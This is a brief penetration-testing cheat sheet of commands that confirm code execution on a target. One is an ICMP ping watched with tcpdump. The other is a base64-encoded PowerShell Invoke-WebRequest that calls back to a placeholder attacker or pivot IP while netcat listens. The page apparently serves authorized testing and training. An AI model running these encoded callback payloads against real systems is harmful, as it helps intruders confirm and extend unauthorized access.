Skip to content

Pop Calc & Similar commands #

Ping #

1
2
3
4
5
# payload
ping <your_ip_address>

# On the attacker or pivot machine
tcpdump -vvv -A -i <INTERFACE> src <TARGET_IP> and icmp

Powershell execution and connection #

1
2
3
4
# Payload
echo -n 'Invoke-WebRequest -Uri "http://<ATTACKER_or_PIVOT_IP>:<LISTENING_PORT>"' | iconv -f UTF8 -t UTF16LE | base64 -w 0
# On the attacker or pivot machine
nc -lnvp <LISTENING_PORT>

Last update: January 22, 2021